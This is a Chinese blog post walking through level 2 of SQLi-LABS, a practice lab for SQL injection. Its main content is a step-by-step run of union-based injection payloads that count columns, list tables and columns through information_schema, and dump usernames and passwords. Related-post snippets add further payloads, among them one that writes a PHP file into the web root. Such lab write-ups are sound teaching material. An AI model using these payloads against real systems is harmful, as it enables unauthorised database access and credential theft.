SQLi-LABS的Less2分析

已于 2024-01-15 15:55:53 修改
阅读量450 收藏 11
点赞数 9
文章标签: 网络安全 sql
于 2024-01-15 15:33:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haoahaoahaoahao/article/details/135601452
版权
文章讲述了如何通过在less2应用中的id参数利用SQL注入漏洞,逐步获取数据库结构信息,包括列数、表名、字段名和用户数据。作者展示了使用`orderby`和`union`查询来执行安全检查的过程。
摘要由CSDN通过智能技术生成

打开less2看到这个提示

请输入id作为数值的参数

像这种id一般为id,’id’,(id)之类

输入?id=1’ 或者?id=1”,显示

输入?id=1显示

在id= 1的时候没报语法错误,那么猜测这存在sql注入漏洞,大概查询语句为select * from where id = 1 limit 0.1

在D:\phpstudy_pro\WWW\sqli-labs-master\Less-2的源代码看看确为如此

知道id= 1没报错后那么我们使用order by命令看看这表的列数有几列吧,那么输入?id=1 order by 2 --+ 看看会发生什么

那么我们发现这没报错,然后数字增加,加到4的时候也就是输入?id=1 order by 2 --+ 的时候报错了,说明这列数为3

使用union查询,判断回显以及各列的输出

?id=-1 union select 1,2,3--+

为什么id等于-1呢,因为设置一个不存在的id那么猜测语句为

那么我们知道表第2列在这显示了,那么将第2列换成database()看看叫什么 那么输入命令

?id=-1 union select 1,database(),3--+

那么可知database叫security

那么在mysql数据库有一个数据库information_schema那么这数据库有4个表分别是 schema_privileges,schemata,tables,columns

其中shemata表内容为所有数据库名 字段schema_name 代表数据库名

     schemata表内容为数据库权限信息,字段table_schema代表数据库与表对应的关系

     tables表内容为所有的表名 字段table_name代表表名

                                                字段 schema_table 代表数据库有表的关系

      columns表为所有字段名 字段column_name代表字段名

那么在MySQL-Front看看吧便于理解

那么爆数据库表

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

//group_concat() 让数据一行显示

那么爆user表的数据字段

 ?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

那么爆数据

?id=-1 union select 1,group_concat(username,'~',password),3 from users--+

完成

haoahaoahaoahao
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Sqli-labs靶场第2关详解[Sqli-labs-less-2]
m0_73615178的博客
02-19 612
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
sqli-labs-master【Less-2】解题过程
u010149713的博客
05-29 532
id=1 #1.正常显示 id=1' #2.错误回显 #You have an error in your SQL syntax; check the manual that corresponds to your MariaDB #server version for the right syntax to use near '' LIMIT 0,1' at line 1 #'' LIMIT...
sqli-labs】Less2——数字型注入
用博客做做记录的小白
06-08 213
sqli-labs靶场第二关Less2数字型注入
Sqli-labs之Less-2
→_→
03-12 1262
Less-2 翻译:获取-基于错误-基于整数 欢迎Dhakkan 请输...
sqli less-02
ANYOUZHEN的博客
04-30 383
输入id=1,回显正常,输入id=1',回显异常,接着输入id=1'--+ 输入id=1'--+仍然报错 其是整型(id=$id limit 0,1),然后不加单引号 猜测成功,我们用常规sql思路走走 ?id=1 order by 3--+ 我们发现表格只有3列 我们使用联合查询进行查找,由于整数型,我们删去’ 输入?id=-1 union select 1,2,3--+ 接着查询数据库?id=-1 union select 1,2,database()--+ ...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs实验指导手册
最新发布
11-17
2. **布尔型注入**(如less-2): - **基于页面反馈**:通过观察页面是否返回特定信息(如" You are in......")来判断注入成功与否。 3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
sql-labs SQL注入平台——第二关Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
Onlyone_1314的博客
05-28 1623
只返回了2、3说明,后端从数据库中执行SQL语句select 1,2,3;只在前端显示了第2、3个字段,所以我们能看到的就只有第2、3个字段,就要把注入点放在第2、3个位置上。查询id为0的用户肯定是没有返回结果的,这样返回的就只有union联合查询的第二个查询 select 1,2,3;得到security数据库中的表emails,referers,uagents,users。返回结果错误:没有第4列数据,说明只存在三列数据。查询,返回结果按照前4列数据排序。(3)查询当前数据库的名称。
sqli-libs————Less2(数字型注入)
Fly_鹏程万里
05-08 1182
Less2同样,我们根据提示传入参数id,数据类型为numeric加入单引号进行测试:爆出错误提示信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' ...
SQLi-LABS Less-1&&Less-2
m0_64898960的博客
04-09 290
SQLI-LABS
Sqli-Labs之less-2
ISNS的博客
02-05 968
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
sqli-labs Less-2解题思路
qq_35266419的博客
05-09 838
首先声明一下,我自己也是一名小白,或者你可以叫我“脚本小子”。只是喜欢这个东西就去钻研,有一点心得就发布出来与大家探讨,有问题请多多指教。末尾更精彩! Less-2 GET-Error based-intiger based ①打开页面,如图所示: ②[如图所示:please input the ID as parameter … ]此处id 传递参数,先测试是否存在漏洞 ③根据返回错误页面...
LESS2(sql注入)
qq_44598397的博客
03-14 896
Less2 源码 输入:http://127.0.0.1/sqlilabs/Less-2/?id=2’ 输出错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server v ersion for the right syntax to use near ‘’ LIM...
Sqli-labs之Less1-10
Mi1k7ea
04-14 4523
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值